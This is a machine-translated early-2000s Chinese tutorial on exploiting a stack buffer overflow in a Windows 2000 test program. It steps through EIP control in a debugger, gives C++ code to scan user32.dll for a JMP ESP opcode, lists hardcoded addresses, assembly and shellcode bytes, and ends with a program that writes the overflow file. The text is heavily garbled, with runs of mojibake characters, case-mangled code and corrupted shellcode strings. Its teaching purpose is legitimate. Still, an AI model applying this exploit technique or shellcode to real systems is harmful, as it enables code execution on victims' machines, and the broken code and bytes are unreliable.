Win2000 Vulnerability (2)
Add time: 01-1-7 11:43:28
Demon Fox Safety Information Network
It will be complex now (this is the source of fun! :)). Set breakpoints at the last line code of the main function, because we only care about it here
Life. Start the debugger now, and make the program run until the breakpoint. Then switch to the anti-assembly window (press Alt 8, or click "View" - "
Debug Windows "-" Disassembly "). In addition, open the memory window and register window.
0040155B 5F POP EDI
0040155C 5E POP ESI
0040155D 5B POP EBX
0040155E 83 C4 50 Add ESP, 50H
00401561 3B EC CMP EBP, ESP
00401563 E8 7E 00 00 00 Call _chkesp (004015E6)
00401568 8B E5 MOV ESP, EBP
0040156A 5D POP EBP
0040156B C3 RET
What is these things? Assembly code. If you don't understand the compilation, I do something simple here. The first line is "POP EDI". instruction
POP is used to move data secondary to the top of the stack to the subsequent registers. It should be noted that the ESP register. ESP is a 32-bit stack pointer. A POP instruction
Move a data unit at the top of the stack, here is DWORD (double word, 4 bytes), to the register, and put the stack pointer (because a total of 4 words
Festival). Let's take a look at the ESP register before performing the next step. Enter an ESP in the memory window to get the current pointing from the ESP. take a look
ESP points to 4 bytes of content and EDI registers in memory address. Now, "POP.edi" is now executed, we can see that the EDI register is filled in.
The value of the memory address pointed to by the ESP, and the value of ESP has also increased 4. The following two instructions are the same, but the registers are different. Single-step execution
They. The three-way instructions followed by this article did not make sense, so they did not explain here. Single step is executed to the command "MOV ESP, EBP", which will put EBP
The value is assigned to the ESP register. Then the command "POP EBP", which is important. Let us enter ESP in the memory window, you can see that the memory address has one
The string "0x61" (the 16-enabled value of 'A'). Therefore, 0x61616161 will be popped up to the EBP register. Single-step execution This instruction can be verified that I said correct
Is it? ;) Ok, although I said it is right, but it seems that we haven't obtained anything that useful? Now, the last instruction "RET" is now. Directive "RET"
An instruction is returned in the assembly. How do it know where to return? Decide by the value currently located at the top of the stack. This instruction If you use a POP instruction table
The words can be expressed as "POP EIP" (although you can't do this POP instruction;)). It pops up 4 bytes from the ESP pointing to the memory address,
And assign the EIP register (EIP register is a 32-bit instruction pointer). This means that no matter which memory address is pointed to the EIP, the instructions at the address? 芑岢 晌
踔 踔 睢 睢 娲 娲 惺 惺 淙 谥 惺 惺 淙,,,,,,, 陨 陨 陨 陨 陨 陨 陨 陨 陨 陨 陨 陨 陨 陨 陨, 陨.,,. 陨,........ 看 谥 看,, 谥.. 陨 陨 谥. 看 陨, 陨,., 陨, In fact, I want to know at this time.
The road is a 4-word diverse 0x61 string. Let us now perform the instruction, see the value of EIP is 0 x61616161, that is, the next command address is
0x61616161, but the instruction is displayed as ??? (meaning invalid instruction). Therefore, then the command will result in an "access illegal" error. Now look at the ESP register. It correctly points to the next value in the stack. Also? Of 撬 ぷ魇 ぷ魇 ぷ魇 ㄔ ㄔ ㄔ 谑 ㄔ 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 觯 ㄔ ㄔ ㄔ ㄔ ㄔ ㄔ ㄔ 觯 觯 ㄔ ㄔ
Whether the address pointed to by the ESP can store our overflow code! We add 4 'a' again in the overflow.txt file, and again
Debugger, observing the memory window and register window when executing to the "RET" instruction, will find the content of the ESP to the memory address after executing the "Ret" instruction is 4
One 0x61 string of bytes. Great! what does this mean? ! Let everyone want to go. ;)))))
Now I will go back and analyze it. We just used the character 'a' (0x61) as the population of the text file to determine the buffer overflow. due to
EIP = 0x61616161, when our program access to the instruction attempt to access the address, the system is erroneous because it is an invalid instruction. But if the point is directed
What is the address of the executable code? For example, loaded into memory DLL code, etc.. Haha, this will execute these instructions, which may do some people think
Like something you can't! ;)
Ok, so far, we can control the value of the EIP, and also know the stack position points to the ESP, and can write any data to the stack. So next step
what? Of course, it is a way to find the system to perform our overflow code. If you have seen IPXODI's article "Stack of windows under the Windows system
", You will know that the jump instruction (JMP ESP) is best. The reason is no longer more here, please read "Windows System under Windows System."
The stack overflow is clear. As analyzed in front, this is because the ESP can point to our overflow code after executing the RET instruction! (... oh, find not
When I arrive, I didn't have it? In this article, look for words "great", huh, huh. Now we have to find "JMP ESP" in the memory space of the application.
The address of the instruction. First of all, it is of course a machine code for determining this command. How to determine? Do you have to teach this? Ok, teach it. Only this time, no violation. ;)
In fact, the method is very simple, you can follow the steps below. Create a new application in Visual C . (Of course, still consumers, or support MFC, this
It is my habit. Ha ha. Enter the following code:
CWINAPPPP;
Using namespace std;
INT_Tmain (int Argc, tchar * argv [], tchar * envp [])
{
INT nretcode = 0;
// Initialize MFC and Print and Error On Failure
IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0))
{
// Todo: Change Error Code To Suit your Needs
CERR << _T ("Fatal Error: MFC Initialization Faled") << ENDL;
NRETCODE = 1;
}
Else
{
Return 0;
__ASM JMP ESP
}
Return nretcode;
}
Ok, then set the correct debug breakpoint in the Visual C environment. where? Yes, at "Return 0;". Then run the program so that it is temporarily in the breakpoint
Stop operation. Now (select "View" menu - "Debug Windows" - "Disassembly" opens the anti-assembly window and in the anti-assembly window
Right-click and select "Source Annotation" and "Code Bytes" in the right-click pop-up menu. At this point, on the right side of the memory address, (JMP ESP)
"FF E4" on the left side of the column is the machine code of the "JMP ESP". If you need to find the machine code of other assembly instructions, it is basically available.
The next step is how to find this string machine code in our process space. It is also very simple, just modify the code:
CWINAPPPP;
Using namespace std;
INT_Tmain (int Argc, tchar * argv [], tchar * envp [])
{
INT nretcode = 0;
// Initialize MFC and Print and Error On Failure
IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0))
{
// Todo: Change Error Code To Suit your Needs
CERR << _T ("Fatal Error: MFC Initialization Faled") << ENDL;
NRETCODE = 1;
}
Else
{
#if 0
Return 0;
__ASM JMP ESP
#ELSE
BOOL WE_LOADED_IT = FALSE;
Hinstance h;
TCHAR DLLNAME [] = _t ("user32");
H = getModuleHandle (DLLNAME);
IF (h == NULL)
{
H = loadingLibrary (DLLNAME);
IF (h == NULL)
{
Cout << "ERROR Loading DLL:" } WE_LOADED_IT = TRUE; } BYTE * PTR = (byte *) h; Bool Done = false; For (int y = 0;! done; y ) { Try { IF (PTR [Y] == 0xFF && PTR [Y 1] == 0xE4) { INT POS = (int) PTR Y; COUT << "opcode found at 0x" <} } Catch (...) { COUT << "end of" } } IF (WE_LOADED_IT) FREELIBRARY (H); #ENDIF } Return nretcode; } Maybe you will be strange, why not use kernel32.dll? Is it more common? I am also looking for the process space of the dynamic link library Kernel32. FF E4, but I can't find it at one place! (I found at least 6 in Windows NT 4!: (() Later I tried to find it in user32.dll, finally found one. Running program output : Opcode Found AT 0x77E2E32A End of user32 memory reached Note that different dynamic link libraries and versions may be different. My dynamic link library User32.dll version is 5.00.2180.1. Now use 16 into Document editor (such as Ultra Edit) opens Overflow.txt text file, starting 2A E3 E2 77 at the 21-character position. (Why is it in the 21 word Rong position? Why enter 2A E3 E2 77? I don't want to explain, if you don't understand this, I suggest you try to study the buffer overflow! ! Leave four 'a' characters behind. Use the debugger to run the program, execute it to the "Ret" command to see if the next instruction is "JMP ESP", and Whether the content of the ESP before performing "JMP ESP" is 0x61616161. If everything is correct, ok, so far so good.;) Let us make more exciting things - Write the execution code after the buffer overflow. First, you must ensure that all required dynamic link libraries are loaded into the process space. One way is to utilize the dynamic link library called itself; another The method is to load the dynamic link library in the overflow code. (In IPXODI "stack overflow under the Windows system? Dephase Xinglo] # ┰ 谡饫 谡饫 谡饫 捎 捎 谝 Estate the pepper ān 恳 恳 蛭 虻ヂ 铩 #? P> Oh, in order to program the simple program, the main purpose of this article is teaching, the focus is the principle, so code execution I am just a message box that pops up. If you want to write more aggressive or more complex execution code, please refer to IPXODI's "Stack of Stack under Windows System" "? 躺 躺 摹 steep acne 迩 觥 觥 2 还 蠊 海? P> First we have to find how to call the MessageBox function in the code. root According to Windows API documents, MessageBox depends on user32.lib, which is in the User32.dll dynamic link library. Start the Depends tool, open Applications that will be overflow can be found to load user32.dll. Then look for the memory location of the Messagebox function. User32.dll in my machine In the middle, the offset of the Messageboxa function is 0x00033d68. User32.dll's starting address in memory is 0x77df0000. Add the two to get the absolute memory address of the Messagebox function is 0x77E23D68. So we need to set the pile in assembly code. Stack and call 0x77e23d68. Root? 荻 荻 TEVE FEWER WINAMP buffer overflow code learning and research, the assembly code I wrote is as follows: Push EBP Push ECX MOV EBP, ESP SUB ESP, 54H XOR ECX, ECX MOV BYTE PTR [EBP-14H], 'S' MOV BYTE PTR [EBP-13H], 'u' MOV BYTE PTR [EBP-12H], 'C' MOV BYTE PTR [EBP-11H], 'C' MOV BYTE PTR [EBP-10H], 'E' MOV BYTE PTR [EBP-0FH], 'S' MOV BYTE PTR [EBP-0EH], 'S' MOV BYTE PTR [EBP-0DH], CL MOV BYTE PTR [EBP-0CH], 'W' MOV BYTE PTR [EBP-0BH], 'E' MOV BYTE PTR [EBP-0AH], '' MOV BYTE PTR [EBP-9], 'G' MOV BYTE PTR [EBP-8], 'O' MOV BYTE PTR [EBP-7], 'T' MOV BYTE PTR [EBP-6], '' MOV BYTE PTR [EBP-5], 'I' MOV BYTE PTR [EBP-4], 'T' MOV BYTE PTR [EBP-3], '!' MOV BYTE PTR [EBP-2], CL Push ECX Lea Eax, [EBP-14H] Push EAX Lea Eax, [EBP-0CH] Push EAX Push ECX MOV DWORD PTR [EBP-18H], 0x 77E23D68 Call DWORD PTR [EBP-18H] MOV ESP, EBP POP ECX POP EBP The above assembly code will call the MessageBox function located at 0x77E23D68, making it the title "Success", the message content is "WE GOT IT!" frame. It must be noted that we cannot use 0 (NULL) as characters in a string, please refer to IPXoDi's "Heap under the Windows System" Stack overflow "and" Advanced Buffer Overflow "in the Green Corps. Now, we have to get this? ┗ 啻 髀搿 7 ㄇ ㄇ 丫 丫 樯芄 樯芄 僦馗 僦馗 W 詈笳 玫 降 幕 髀 ? P> / x55 / x51 / x8b / x-x33 / xc9 / xc6 / x45 / xec / x53 / xc6 / x45 / xed / x75 / xc6 / x45 / XEE / X63 / XC6 / X 45 / XEF / XF0 / XC6 / XC6 / X45 / XF1 / X73 / XC6 / X45 / XF2 / X73 / X88 / X4D / XF3 / XC6 / X45 / XF4 / X57 / XC6 / X45 / XF5 / XF6 / X20 / XC6 / X45 / XF7 / X47 / XC6 / X45 / XF8 / X6F / XC6 / X45 / XF9 / X74 / XC6 / X45 / XFA / X20 / XC6 / X45 / XFB / X49 / XC6 / X45 / XFC / X74 / XC6 / X45 / XFD / x21 / x88 / x4d / xfe / x51 / x8d / x45 / x-x50 / x8d / x45 / xf4 / x50 / x51 / xc7 / x45 / xe8 / x68 / x3d / XE2 / X77 / XFF / X55 / XE8 / X8B / XE5 / X59 / X5D If this is now entered into the overflow.txt file, it will be able to successfully overflow, and we will pop up our custom message box. But when you click the "OK" button, apply The program will crash. To avoid this, we need to call the EXIT function to close the program normally. Check if you know the Wi NDOWS API documentation, you need to import MSVCRT.LIB, thus certainly in the MSVCRT.DLL dynamic link library. Using the Depends Tool will find that the application loads MSVCRTD.DLL instead of Msvcrt.dll, this is because our application is now using a debug version. But both? 稹 稹svcrtd.dll in the start of the memory 0x10200000, the EXITRY POINT is 0x0000AF90, then the absolute address of the exit function is 0x1020af90. Therefore, the assembly code is: Push EBP Push ECX MOV EBP, ESP SUB ESP, 10h XOR ECX, ECX Push ECX Mov DWORD PTR [EBP-4], 0X1020AF90 Call DWORD PTR [EBP-4] MOV ESP, EBP POP ECX POP EBP The above code calls the EXIT function with 0 to the parameter, so that the application runs out with code 0. The machine code obtained after the finishing is as follows: / X55 / X51 / XEC / XEC / X33 / XC9 / X51 / XC7 / X45 / XFC / X90 / XAF / X20 / X10 / XFF / X55 / XFC / X8B / XE5 / X59 / X5D Now enter the above two string machine code into the overflow.txt file (starting with the 25th byte. This time, don't ask why ?! If you still don't understand, Review the previous content!) If you are troublesome, you can use the following procedure (how, enough friends?;)): CWINAPPPP; Using namespace std; INT_Tmain (int Argc, tchar * argv [], tchar * envp []) { INT nretcode = 0; // Initialize MFC and Print and Error On Failure IF (! Afxwininit (:: getModuleHandle (Null), NULL, :: getcommandline (), 0)) { CERR << _T ("Fatal Error: MFC Initialization Faled") << ENDL; NRETCODE = 1; } Else { Char buffer [20]; // 0x77e2e32a //user32.dll JMP ESP CHAR EIP [] = "/ x2a / xe3 / xe2 / x77"; Char sploit [] = "/ x55 / x51 / x8b / XEC / x83 / XC9 / XC6 / X45 / XEC / XEC / XEC6 / X45 / XED / x75 / XC6 / X45 / XEE" "/ x63 / xc6 / x45 / x45 / xf0 / x65 / xc6 / x45 / xf1 / x73 / xc6 / x45 / xf2 / x73 / x88 / x4d / xf3 / XC6" "/ X45 / XF4 / XF5 / XC6 / XC6 / X45 / XF6 / X20 / XC6 / X45 / XF7 / X47 / XC6 / X45 / XF8 / X6F / XC6 / X45" "/ XF9 / X74 / XC6 / X45 / XFA / X20 / XC6 / X45 / XFB / X49 / XC6 / X45 / XFC / X74 / XC6 / X45 / XFD / XFE" "/ X51 / X8D / X45 / XEC / X50 / X8D / X45 / XF4 / X50 / X51 / XC7 / X45 / XE8 / X68 / X3D / XE2 / X77 / XFF / X55 / XE8 / X8B" "/ XE5 / X59 / X5D / XEC / X83 / XEC / X10 / X33 / XC9 / X51 / XC7 / X45 / XFC / X90 / XAF / X20 / X10 / XFF" "/ x55 / xfc / x8b / xe5 / x59 / x5d"; For (int x = 0; x <20; x ) { Buffer [x] = 0x90; } CFILE FILE; File.open ("overflow.txt", cfile :: modecreate | cfile :: modewrite; File.write (buffer, 20); File.Write (EIP, Strlen (EIP)); File.write (sploit, strlen (sploit); File.Close (); } Return nretcode; } After ensuring that the content and location of all files is accurate, run the overflower .......... Haha, our message box is coming out! ! ! Click "OK" Button, the program is close to the program! ! ! - [Post " Recently visited foreign security sites, hacking sites, found more and more attention to the security of Windows systems, and research the vulnerability of Windows system. Many, including L0PHT, Cerberus, etc. Especially in some hacking sites, a bunch of attackers for Windows 9x / NT / 2K. Really a bit Dare to imagine, if Micro $ OFT discloses all Windows source code, how many security vulnerabilities have been discovered. And I think, according to the domestic use of the Windows platform The problem will be even more serious. So I think the security research of the country? 诙訵 inde should be more tight! Although the actual situation is frustrating ... :( This article is not intended to organize, because I have just started to study the buffer overflow under the Windows system, the things that have not been made, worrying by Windows Master smirk. Later, I figured out myself: I only "the class door ax" can only know that my shortcomings can make progress faster. I hope that the WINDOWS masters, A lot of hacker teaches. It is like IPXODI, Yuan Ge, Zer9, etc. in our green corps, is a security expert under the Windows platform. If this article can play a "throwing brick I am very satisfied. :)